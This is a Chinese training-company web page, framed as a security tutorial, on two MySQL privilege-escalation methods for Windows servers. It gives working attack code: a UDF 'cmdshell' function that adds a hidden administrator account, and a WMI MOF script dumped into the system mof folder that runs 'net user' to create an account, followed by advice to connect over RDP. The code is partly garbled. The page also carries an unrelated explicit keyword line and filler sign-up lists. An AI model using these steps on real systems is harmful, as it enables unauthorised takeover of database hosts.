一区二区三区中文国产亚洲_另类视频区第一页_日韩精品免费视频_女人免费视频_国产综合精品久久亚洲

千鋒教育-做有情懷、有良心、有品質(zhì)的職業(yè)教育機(jī)構(gòu)

手機(jī)站
千鋒教育

千鋒學(xué)習(xí)站 | 隨時(shí)隨地免費(fèi)學(xué)

千鋒教育

掃一掃進(jìn)入千鋒手機(jī)站

領(lǐng)取全套視頻
千鋒教育

關(guān)注千鋒學(xué)習(xí)站小程序
隨時(shí)隨地免費(fèi)學(xué)習(xí)課程

當(dāng)前位置:首頁(yè)  >  技術(shù)干貨  > 【網(wǎng)絡(luò)安全學(xué)習(xí)教程】mysql 兩種提權(quán)方式詳解

【網(wǎng)絡(luò)安全學(xué)習(xí)教程】mysql 兩種提權(quán)方式詳解

來(lái)源:千鋒教育
發(fā)布人:syq
時(shí)間: 2022-07-04 15:44:00 1656920640

  Mysql_UDF 提權(quán)

  要求:

  1.目標(biāo)系統(tǒng)是 Windows(Win2000,XP,Win2003);

  2.擁有 MYSQL 的某個(gè)用戶賬號(hào),此賬號(hào)必須有對(duì) mysql 的 insert 和 delete 權(quán)限以創(chuàng)建和拋棄函數(shù)

   3.有 root 賬號(hào)密碼 導(dǎo)出 udf: MYSQL 5.1 以上版本,必須要把 udf.dll 文件放到 MYSQL 安裝目錄下的 lib\plugin 文件夾下才能創(chuàng)建自定義函數(shù)可以再 mysql 里輸入select @@basedirshow variables like ‘%plugins%’尋找 mysql 安裝路徑。

網(wǎng)絡(luò)安全學(xué)習(xí)教程

  提權(quán):使用 SQL 語(yǔ)句創(chuàng)建功能函數(shù)。

  語(yǔ)法:Create Function 函數(shù)名(函數(shù)名只能為下面列表中的其中之一)

  returns string soname ‘導(dǎo)出的 DLL 路徑’;  

create function cmdshell returns string

soname ‘udf.dll’select cmdshell(‘net user arsch arsch

/add’);select

cmdshell(‘net localgroup

administrators arsch /add’);

drop function

  cmdshell;該目錄默認(rèn)是不存在的,這就需要我們使用 webshell 找到 MYSQL 的安裝目錄,并在安裝目錄下創(chuàng)建lib\plugin 文件夾,然后將 udf.dll 文件導(dǎo)出到該目錄即可。

  Mysql mof 提權(quán)  

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter{EventNamespace = "Root\\Cimv2";Name =

"filtP2";Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa

\"Win32_LocalTime\" ""And TargetInstance.Second = 5";QueryLanguage = "WQL";};

instance of ActiveScriptEventConsumer as $Consumer{Name = "consPCSV2";ScriptingEngine =

"JScript";ScriptText ="var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user

waitalone waitalone.cn /add\")";};

instance of __FilterToConsumerBinding{Consumer

= $Consumer;Filter = $EventFilter;};

  其中的第 18 行的命令,上傳前請(qǐng)自己更改。

  執(zhí)行 load_file 及 into dumpfile 把文件導(dǎo)出到正確的位置即可。  

select load file('c:/wmpub/nullevt.mof') into dumpfile

'c:/windows/system32/wbem/mof/nullevt.mov'

  執(zhí)行成功后,即可添加一個(gè)普通用戶,然后你可以更改命令,再上傳導(dǎo)出執(zhí)行把用戶提升到管理員權(quán)限,然后 3389 連接之就 ok 了。

  更多關(guān)于“網(wǎng)絡(luò)安全培訓(xùn)”的問(wèn)題,歡迎咨詢千鋒教育在線名師。千鋒教育多年辦學(xué),課程大綱緊跟企業(yè)需求,更科學(xué)更嚴(yán)謹(jǐn),每年培養(yǎng)泛IT人才近2萬(wàn)人。不論你是零基礎(chǔ)還是想提升,都可以找到適合的班型,千鋒教育隨時(shí)歡迎你來(lái)試聽(tīng)。

tags:
聲明:本站稿件版權(quán)均屬千鋒教育所有,未經(jīng)許可不得擅自轉(zhuǎn)載。
10年以上業(yè)內(nèi)強(qiáng)師集結(jié),手把手帶你蛻變精英
請(qǐng)您保持通訊暢通,專屬學(xué)習(xí)老師24小時(shí)內(nèi)將與您1V1溝通
免費(fèi)領(lǐng)取
今日已有369人領(lǐng)取成功
劉同學(xué) 138****2860 剛剛成功領(lǐng)取
王同學(xué) 131****2015 剛剛成功領(lǐng)取
張同學(xué) 133****4652 剛剛成功領(lǐng)取
李同學(xué) 135****8607 剛剛成功領(lǐng)取
楊同學(xué) 132****5667 剛剛成功領(lǐng)取
岳同學(xué) 134****6652 剛剛成功領(lǐng)取
梁同學(xué) 157****2950 剛剛成功領(lǐng)取
劉同學(xué) 189****1015 剛剛成功領(lǐng)取
張同學(xué) 155****4678 剛剛成功領(lǐng)取
鄒同學(xué) 139****2907 剛剛成功領(lǐng)取
董同學(xué) 138****2867 剛剛成功領(lǐng)取
周同學(xué) 136****3602 剛剛成功領(lǐng)取

上一篇

【學(xué)習(xí)教程】拿到一個(gè)待檢測(cè)的站,你覺(jué)得應(yīng)該先做什么?

下一篇

【網(wǎng)絡(luò)安全學(xué)習(xí)教程入門篇】網(wǎng)絡(luò)安全基礎(chǔ)知識(shí)介紹
相關(guān)推薦HOT
什么是PlatformIo?

PlatformIO是什么PlatformIO是一個(gè)全面的物聯(lián)網(wǎng)開(kāi)發(fā)平臺(tái),它為眾多硬件平臺(tái)和開(kāi)發(fā)環(huán)境提供了統(tǒng)一的工作流程,有效簡(jiǎn)化了開(kāi)發(fā)過(guò)程,并能兼容各種...詳情>>

2023-10-14 12:55:06
云快照與自動(dòng)備份有什么區(qū)別?

1、定義和目標(biāo)不同云快照的主要目標(biāo)是提供一種快速恢復(fù)數(shù)據(jù)的方法,它只記錄在快照時(shí)間點(diǎn)后的數(shù)據(jù)變化,而不是所有的數(shù)據(jù)。自動(dòng)備份的主要目標(biāo)...詳情>>

2023-10-14 12:48:59
服務(wù)器為什么要用Linux?

服務(wù)器為什么要用Linux作為服務(wù)器操作系統(tǒng)的優(yōu)選,Linux在眾多選擇中脫穎而出。Linux作為服務(wù)器操作系統(tǒng)的優(yōu)選,有其獨(dú)特的優(yōu)勢(shì)和特點(diǎn)。包括其...詳情>>

2023-10-14 12:34:11
ORM解決的主要問(wèn)題是什么?

ORM(對(duì)象關(guān)系映射)解決的主要問(wèn)題是將關(guān)系數(shù)據(jù)庫(kù)與面向?qū)ο缶幊讨g的映射困境。在傳統(tǒng)的關(guān)系數(shù)據(jù)庫(kù)中,數(shù)據(jù)以表格的形式存儲(chǔ),而在面向?qū)ο?..詳情>>

2023-10-14 12:26:19
Go為什么不支持三元運(yùn)算符?

Go為什么不支持三元運(yùn)算符Go語(yǔ)言是一種以簡(jiǎn)潔和有效性為目標(biāo)的編程語(yǔ)言,因此在設(shè)計(jì)過(guò)程中,Go的設(shè)計(jì)者刻意排除了一些他們認(rèn)為可能導(dǎo)致復(fù)雜性或...詳情>>

2023-10-14 12:12:36